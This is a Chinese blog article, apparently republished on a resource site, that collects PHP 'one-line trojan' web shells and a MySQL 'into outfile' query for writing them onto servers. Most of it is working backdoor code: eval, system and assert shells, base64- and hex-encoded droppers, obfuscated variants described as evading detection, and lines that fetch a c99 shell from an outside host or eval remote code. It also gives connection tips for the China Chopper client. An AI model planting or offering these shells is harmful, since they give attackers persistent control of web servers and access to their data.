PHP与SQL语句写一句话木马总结

000

一、基础类的一句话–功能仅限于验证漏洞了,实际中非常容易被查出出来:

<?php @eval($_GET[\"code\"])?>

<?php @system($_POST[\"cmd\"])?>

二、编码的替换的类型:

<?php @fputs(fopen(base64_decode(\'bG9zdC5waHA=\'),w),base64_decode(\'PD9waHAgQGV2YWwoJF9QT1NUWydsb3N0d29sZiddKTs/Pg==\'));?>

//会生成<?php @eval($_POST[\'lostwolf\']);?>

 

<script language=\"php\">@fputs(fopen(base64_decode(\'bG9zdC5waHA=\'),w),base64_decode(\'PD9waHAgQGV2YWwoJF9QT1NUWydsb3N0d29sZiddKTs/Pg==\'));</script>

//php在html内部的一种嵌入方式

 

<?php fputs (fopen(pack(\"H*\",\"6c6f7374776f6c662e706870\"),\"w\"),pack(\"H*\",\"3c3f406576616c28245f504f53545b6c6f7374776f6c665d293f3e\"))?>

 

 

<?php

session_start();

$_POST[\'code\'] && $_SESSION[\'theCode\'] = trim($_POST[\'code\']);

$_SESSION[\'theCode\']&&preg_replace(\'\\\'a\'eis\',\'e\'.\'v\'.\'a\'.\'l\'.\'(base64_decode($_SESSION[\\\'theCode\']))\',\'a\');?>

三、其他类型:

<?php $_GET[a]($_GET[b]);?>

//?a=assert&b=${fputs%28fopen%28base64_decode%28Yy5waHA%29,w%29,base64_decode%28PD9waHAgQGV2YWwoJF9QT1NUW2NdKTsgPz4x%29%29};

<?php assert($_REQUEST[\"pass\"]);?>   //菜刀连接 躲避检测 密码pass 

<?php substr(md5($_REQUEST[\'x\']),28)==\'acd0\'&&eval($_REQUEST[\'pass\']);?>

//菜刀提交 http://192.168.1.5/x.php?x=lostwolf 脚本类型:php 密码为 pass

四、下载类型:

<?php echo copy(\"http://www.r57.me/c99.txt\",\"lostwolf.php\"); ?> 

<? echo file_get_contents(\"..//cfg_database.php\");?> //显示某文件

<? eval ( file_get_contents(\"远程shell\")) ?> //运行远程shell

五、无关键函数类型:

<?php

$_=\"\";

$_[+\"\"]=\'\';

$_=\"$_\".\"\";

$_=($_[+\"\"]|\"\").($_[+\"\"]|\"\").($_[+\"\"]^\"\");

?>

<?php ${\'_\'.$_}[\'_\'](${\'_\'.$_}[\'__\']);?>

http://site/2.php?_=assert&__=eval($_POST[\'pass\']) 密码是pass

<?$_=\"\";$_[+\"\"]=\'_\';$_=\"$_\".\"\";$_=($_[+\"\"]|\"\").($_[+\"\"]|\"\").($_[+\"\"]^\"\");?>

六、补充知识点:

SQL写一句话(MySQL):

select \"<?php @system($_POST[\"pass\"]);?>\" into outfile \"/home/webaccount/projectname/www/*.php\"

#前面是一句话内容 后面是绝对路径www下的PHP文件,同理其他脚本也可以

以上就是PHP一句话木马小结与SQL语句写一句话木马的详细内容,感谢大家的学习和对免费资源网的支持。

© 版权声明
版权声明 1 本网站名称:偶像资源网
2 本站永久网址:https://www.ox520.com
3 本网站的文章部分内容可能来源于网络,仅供大家学习与参考,如有侵权,请联系站长 QQ593098775进行删除处理。
4 本站一切资源不代表本站立场,并不代表本站赞同其观点和对其真实性负责。
5 本站一律禁止以任何方式发布或转载任何违法的相关信息,访客发现请向站长举报
6 本站资源大多存储在云盘,如发现链接失效,请联系我们我们会第一时间更新。
THE END
PHP
# 编程开发# php
喜欢就支持一下吧
点赞0 分享
网络的头像-偶像资源网
python多维列表总是只转为一维数组问题解决-偶像资源网
python多维列表总是只转为一维数组问题解决
python多维列表总是只转为一维数组问题解决
28天前 41
Python pyecharts 数据可视化模块的配置方法-偶像资源网
Python pyecharts 数据可视化模块的配置方法
Python pyecharts 数据可视化模块的配置方法
28天前 28
CSS 点击radio实现两个图片样式切换并且多个radio中只能有一个checked-偶像资源网
CSS 点击radio实现两个图片样式切换并且多个radio中只能有一个checked
CSS 点击radio实现两个图片样式切换并且多个radio中只能有一个checke...
32天前 4
jQuery实现滚动效果-偶像资源网
jQuery实现滚动效果
jQuery实现滚动效果
29天前 3
PHP队列原理及基于队列的写文件案例-偶像资源网
PHP队列原理及基于队列的写文件案例
PHP队列原理及基于队列的写文件案例
28天前 2
css文本两端对齐的实现代码-偶像资源网
css文本两端对齐的实现代码
css文本两端对齐的实现代码
32天前 2
相关推荐
python多维列表总是只转为一维数组问题解决-偶像资源网
python多维列表总是只转为一维数组问题解决
python多维列表总是只转为一维数组问题解决
28天前 41
Python pyecharts 数据可视化模块的配置方法-偶像资源网
Python pyecharts 数据可视化模块的配置方法
Python pyecharts 数据可视化模块的配置方法
28天前 28
吊打全网所有精美导航页引导页HTML源码-偶像资源网
吊打全网所有精美导航页引导页HTML源码
吊打全网所有精美导航页引导页HTML源码
32天前 24
css的基本选择器有哪些?-偶像资源网
css的基本选择器有哪些?
css的基本选择器有哪些?
33天前 23
5.9K⭐ 轻松搞定定时任务!Web管理超便捷-偶像资源网
5.9K⭐ 轻松搞定定时任务!Web管理超便捷
5.9K⭐ 轻松搞定定时任务!Web管理超便捷
32天前 23
CSS 点击radio实现两个图片样式切换并且多个radio中只能有一个checked-偶像资源网
CSS 点击radio实现两个图片样式切换并且多个radio中只能有一个checked
CSS 点击radio实现两个图片样式切换并且多个radio中只能有一个checked
32天前 4
评论 抢沙发

请登录后发表评论

    暂无评论内容